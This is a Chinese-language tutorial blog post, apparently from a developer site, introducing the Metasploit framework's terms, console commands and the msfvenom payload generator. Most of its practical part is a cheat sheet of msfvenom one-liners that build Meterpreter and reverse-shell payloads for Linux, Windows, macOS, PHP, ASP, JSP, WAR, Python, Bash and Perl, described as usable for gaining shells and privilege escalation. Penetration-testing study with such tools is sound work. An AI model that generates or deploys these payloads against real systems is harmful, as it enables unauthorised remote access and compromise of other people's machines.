msf 生成php马_msf系列篇章之msf的基础模块和命令

1、 msf的基础介绍

kali是默认集成了mepasploit framework,简称为msf,不同的框架下,它有不同的模块,不同的模块之间,互相交流彼此生产输入输出的数据,第一个模块生成的数据可以给第二个或者第三个模块去直接拿来使用,原因是它拿来使用的是后台有数据库,其它的版本后面也有数据库,比如说我们扫描的目标系统,扫描下来的信息,比如说开放了哪些端口,哪些信息,都会存到数据库里面,而measploit framework用的是postgresql数据库来进行存储。

早期的msf版本需要先启动数据库再启动msf

2)msf的基本机构

24a86fe37a237e238ddaff50296d0bc1.png

3)、msf的基础操作和命令

在这里的话,我们打开kali的终端,输入msfconsole打开msf的界面,因为kali系统是自带的msf工具,执行命令之后,它这里会进行一个初始化,接着就可以看见msf的命令行界面

d54cab4f19aab22f1a1bfab1ab6a6a4e.png

4)msf中专业术语,因为在msf中,这些都是常见的专业术语,也是必要的

– Exploit,攻击工具/代码

– Payload,攻击载荷

– Shellcode

– Module,模块

– Listener,监听器

5)、常用命令

showpayloads (show 可以理解为显示的意思), 查看所有可用的渗透攻击程序代码

f5eba137466dffd13e6e3e1c87f91802.png

show auxiliary – 查看所有可用的辅助攻击工具,然后就可以看见显示出相对应的辅助工具

8c7b54f1a454607b237839d36ecaa1f2.png

Use exploist/windows/iis/cve_2017_7269 进入相对应的模块,比如说我进入了cve_2017_7269漏洞模块,接着就可以看见它这里进入了

139bb8290bb0888d2670ab4426cb6cec.png

show options – 查看该模块所有可用选项,比如说我们进入cve_2017_7269漏洞模块,执行攻击的话,需要配置该模块的一些选项

3bddeeb5a83cc8c54dc551c3e57addd7.png

show payloads – 查看该模块适用的所有载荷代码,然后就可以显示出相对应的payload

62cf31d324af67a86ee6948553a71499.png

show targets – 查看该模块适用的攻击目标类型

search ssh - 根据关键字搜索某模块,比如说我搜索ssh相对应的漏洞模块,就可以看见显示出相对应的ssh关键词的模块

b80a5a412b2373bfbcfa0601fb2cb4db.png

info – 显示某模块的详细信息

81493f8582b5683689a237f1aa3cab4a.png

bach –退出当前进行的模块

0b42a68d5f1ed6fdf9df63b6cac7cebc.png

6)msfvenom (攻击载荷生成和编码器)

主要参数:

-p payload

-e 编码方式

-i 编码次数

-b 在生成的程序中避免出现的值

LHOST,LPORT 监听上线的主机IP和端口

-f exe 生成EXE格式

使用msfvenom -l 可以查看可以利用payload

msfvenom -l | grep windows | grep x64 | grep tcp 选择payload

7)、在Linux命令下,执行msf命令生成可执行的文件,这些文件用来反弹shell用于提权,各种可执行的脚本命令如下。

Linux:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

Windows:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

Mac:

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho

PHP:

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php

cat shell.php | pbcopy && echo '<?php ' | tr -d '' > shell.php && pbpaste >> shell.php

ASP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

JSP:

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

WAR:

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

Python:

msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

Bash:

msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

Perl:

msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

最后喜欢我文章的朋友请加圈子关注我们,私信关键词:学习。(送免费资料和优惠券)

就会自动分享给你微信号。欢迎大家加入我们的安全大家庭。提高大家的安全意识,提升大家的网络安全技能一直是我们的初衷和愿景,让我们共同成为守护信息世界的"SaFeMAN"。

还有可以关注我们微信公众号,在公众号上输入安界网,就可以关注到我们,领取资料和优惠券

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值